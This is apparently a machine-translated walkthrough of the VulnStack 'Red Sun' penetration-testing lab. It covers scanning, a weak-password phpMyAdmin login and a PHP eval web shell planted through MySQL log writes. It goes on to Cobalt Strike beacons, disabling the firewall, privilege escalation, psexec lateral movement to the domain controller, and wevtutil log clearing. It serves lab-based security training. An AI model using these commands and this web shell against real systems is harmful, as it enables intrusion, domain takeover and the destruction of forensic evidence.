preamble
VulnStack, as a knowledge platform crafted by the Red Sun security team, has the unique advantage of comprehensively simulating the actual business scenarios of domestic enterprises.Covers core elements such as CMS, vulnerability management and domain management. This design concept stems from the red security team's deep understanding and skillful application of the ATT&CK red team assessment design pattern. The construction of the range environment and the design of the title are centered around theEnvironment setup, vulnerability exploitation, intranet information collection, lateral movement, penetration channel construction, persistence control and trace cleaningand other multi-dimensional development, aimed at creating a real and comprehensive intranet penetration learning environment for security researchers. If anything goes wrong, please point out the masters, the content is for reference only, do not spray, thank you.
environmental preparation
Download link:/vuln/detail/2/
There are three machines in Red Sun One's target machine.
network topology
First modify the virtual network editor to host-only NICs for segment 52
Win7 extranet host add a network card for emulating a public server
After starting to configure the local connection to automatically obtain ip, it is set by default static is not our host net mode, you can not access the Internet, or even access to the host!
Win2008 is the domain control host, configured as follows, change net mode to host only
Win2003 for domain members
boot environment
Login password: hongrisec@2019, all three passwords are the same, if you are asked to change the password again after logging in, then all three machines are the password after you change it, and the account name are Administrator
Win7 start web service to start infiltration now!
Information collection
Discovery Host 129
Then do an nmap port scan on him and find open mysql ports on ports 80 and 3306
Access to the address of the target machine, which contains the absolute path to the system's phpstudy site and the administrator's e-mail address, as well as the remote file containing the function to open the
Scrolling down also reveals a mysql detection
Default weak password root/root, you can test the login successfully
We used dirb, the directory scanner that comes with kali, and scanned the following
dirb http://192.168.209.129/
One visit to find available information,, php version 5.4.45
There's also a phpmyadmin, just log in with the weak password you just used
web penetration
Enter the background, found that mysql does not allow to write files to the outside, not to get the system permissions before we can not modify the path to write the file
show variables like "secure%";
Then use the second way, logging writes to
show variables like "%general%";
We use the root account belongs to the DBA user, this time we can directly modify the log path to the current site's root directory, and create a, write a sentence *, note that the write here is actually written to the log file, rather than writing files to the outside, so there is no need to secure_file_priv parameter for " "
set global general_log="on";
set global general_log_file="C:/phpStudy/WWW/";
Write a one-sentence * horse to the logs, and you can go live successfully
select "<?php @eval($_POST[10]); ?>";
Access log
Ant Sword Connection
cs generate * horse
upload * horse (computing)
Execute the * horse and you're online.
Turn off the firewall. It doesn't matter if it's off here.
shell netsh advfirewall set allprofiles state off
Elevation of Privileges
View permission information, is a super administrator
getuid
Elevation of Privileges
Select the listening module for your kali server address
Try one by one, option xvc-exe to lift power
Privilege to System Privileges Successful
Intranet information collection
View ip address
shell ipconfig
Show all system users
shell net user
Enumerate computer names
shell net view
Determine if a domain exists
shell net config Workstation
Checking how many domains there are results in GOD one
shell net view /domain
utilizationskipPerform port scanning
Specify another NIC for this host, either using arp scan or icmp scan.
Found two mainframes
And it's all open.445 port
capture a cleartext password
intranet horizontal
We just found port 445 open when we port scanned, so we can create theSMB listening tunnel(The SMB (Server Message Block) protocol on Windows is a network file sharing protocol that allows users to access resources such as files and printers between computers on a network.)
New Listener
Presentation of objectives in list form
Locate the domain control host that was just scanned for thelateral movementSelect the psexec option.
The configuration is as follows
This is when you get the domain control server
The same is true for the other intranet host, since they are both under the same domain
Clear the logs, be careful, run it more than once, some times it may not be cleaned up
shell wevtutil cl security //clear security logs
shell wevtutil cl system //clear system logs
shell wevtutil cl application //clear application logs
shell wevtutil cl "windows powershell" //clear power shell logs
shell wevtutil cl Setup //clears the "Setup" event from the event log.
Or just use the plugin
Network topology maps are all online
summarize
I managed to get 3 target machines on line, hhhhhhh, masters point and click, crabs
recall the past and present
The latest available, bp + charles applet grabbing tutorials
[Intranet Penetration] ICMP Tunneling Technology, ICMP Encapsulation Penetrating Firewall on MSF/CS
Intranet penetration tools, Cobal_Strike Chinese guide to use
DC-2 integrated penetration, rbash escape, git lift, wordpress range penetration tutorials
Penetration testing] 12 rbash escape way summary